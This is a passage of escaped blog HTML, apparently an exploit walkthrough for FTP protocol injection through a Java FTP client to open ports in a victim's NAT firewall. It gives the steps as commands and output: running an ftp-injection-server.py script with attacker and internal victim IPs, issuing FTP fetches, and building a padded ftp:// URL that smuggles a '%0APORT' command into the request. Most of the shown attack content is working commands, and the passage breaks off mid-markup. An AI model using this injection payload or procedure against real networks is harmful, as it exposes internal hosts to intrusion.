[Format Time: 0.0002 seconds] -->  <\/p>\n<p>This should cause the Attacker Server (EAS) FTP service to response something like:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce4485ca497386069\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8212;8&lt; &#8212;  Connection received from 8.14.14.15:35278.  &gt;&gt; USER x  &gt;&gt; PASS y  &gt;&gt; TYPE I  &gt;&gt; EPSV ALL  &gt;&gt; PASV  &gt;&gt; EPRT |1|10.1.2.3|38395|  &gt;&gt; RETR foo.txt  Unknown command: b&#8217;RETR foo.txtrn&#8217;  &#8212;&gt;8&#8212;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485ca497386069-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485ca497386069-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485ca497386069-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485ca497386069-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485ca497386069-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485ca497386069-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485ca497386069-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485ca497386069-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485ca497386069-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485ca497386069-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485ca497386069-11\">11<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce4485ca497386069-1\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485ca497386069-2\"><span class=\"crayon-e\">Connection <\/span><span class=\"crayon-e\">received <\/span><span class=\"crayon-i\">from<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.14.14.15<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">35278.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485ca497386069-3\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">USER<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485ca497386069-4\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">PASS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">y<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485ca497386069-5\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">TYPE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">I<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485ca497386069-6\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">EPSV <\/span><span class=\"crayon-v\">ALL<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485ca497386069-7\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PASV<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485ca497386069-8\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">EPRT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">10.1.2.3<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">38395<\/span><span class=\"crayon-o\">|<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485ca497386069-9\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">RETR <\/span><span class=\"crayon-v\">foo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">txt<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485ca497386069-10\"><span class=\"crayon-e\">Unknown <\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;RETR foo.txtrn&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485ca497386069-11\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0010 seconds] -->  <\/p>\n<p><u>Step 1: Verify Victim Firewall (VF) is Translating PORT\/EPRT Commands<\/u><\/p>\n<p>Let&#8217;s make sure your firewall is behaving as we expect &#8211; stop the FTP server script if is is already running and start it again:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce4485cc916201397\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> .\/ftp-injection-server.py 1.3.3.7 10.1.2.3 12345<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485cc916201397-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce4485cc916201397-1\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ftp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">injection<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">py<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1.3.3.7<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10.1.2.3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12345<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p>The first IP address is the external IP of the Attacker Server (EAS), the second is the internal IP of the Victim Target (VT), and the last argument is the port number we would like to open up for attack.<\/p>\n<p>Next, run a non-malicious FTP <em>fetch<\/em> to see if the firewall translates this port 21 traffic:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce4485e9591267180\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">  java fetch ftp:\/\/x:y@1.3.3.7\/foo.txt<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485e9591267180-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce4485e9591267180-1\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">java <\/span><span class=\"crayon-e\">fetch <\/span><span class=\"crayon-v\">ftp<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/x:y@1.3.3.7\/foo.txt<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<p>You should see the Attacker Server (EAS) service to response something like:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce4485ed479497853\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8212;8&lt;&#8212;  Connection received from 8.14.14.15:37516.  &gt;&gt; USER x  &gt;&gt; PASS y  &gt;&gt; TYPE I  &gt;&gt; EPSV ALL  &gt;&gt; PASV  &gt;&gt; EPRT |1|8.14.14.15|45545|  &gt;&gt; RETR foo.txt  Unknown command: b&#8217;RETR foo.txtrn&#8217;  Closing control channel.  &#8212;&gt;8&#8212;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485ed479497853-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485ed479497853-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485ed479497853-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485ed479497853-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485ed479497853-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485ed479497853-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485ed479497853-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485ed479497853-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485ed479497853-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485ed479497853-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485ed479497853-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485ed479497853-12\">12<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce4485ed479497853-1\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485ed479497853-2\"><span class=\"crayon-e\">Connection <\/span><span class=\"crayon-e\">received <\/span><span class=\"crayon-i\">from<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.14.14.15<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">37516.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485ed479497853-3\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">USER<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485ed479497853-4\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">PASS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">y<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485ed479497853-5\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">TYPE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">I<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485ed479497853-6\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">EPSV <\/span><span class=\"crayon-v\">ALL<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485ed479497853-7\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PASV<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485ed479497853-8\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">EPRT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">8.14.14.15<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">45545<\/span><span class=\"crayon-o\">|<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485ed479497853-9\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">RETR <\/span><span class=\"crayon-v\">foo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">txt<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485ed479497853-10\"><span class=\"crayon-e\">Unknown <\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;RETR foo.txtrn&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485ed479497853-11\"><span class=\"crayon-e\">Closing <\/span><span class=\"crayon-e\">control <\/span><span class=\"crayon-v\">channel<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485ed479497853-12\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0010 seconds] -->  <\/p>\n<p><u>Step 2: Determine CWD Padding Length<\/u><\/p>\n<p>The FTP server script will automatically determine the correct packet offset by first asking you to fetch a long URL via the vulnerable client, and then calculating what the correct padding length is.<\/p>\n<p>Restart the FTP server script with the same arguments from Step 1.<\/p>\n<p>It should response a message like this upon startup: <\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce4485fe156468683\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8212;8&lt;&#8212;  First try to give the vulnerable host this URL:  ftp:\/\/x:y@1.3.3.7\/leetXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXX%0APORT%2010,1,2,3,48,57\/z.txt  &#8212;&gt;8&#8212;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485fe156468683-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485fe156468683-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485fe156468683-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485fe156468683-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485fe156468683-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485fe156468683-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485fe156468683-7\">7<\/div>\n<div class=\"crayon-num 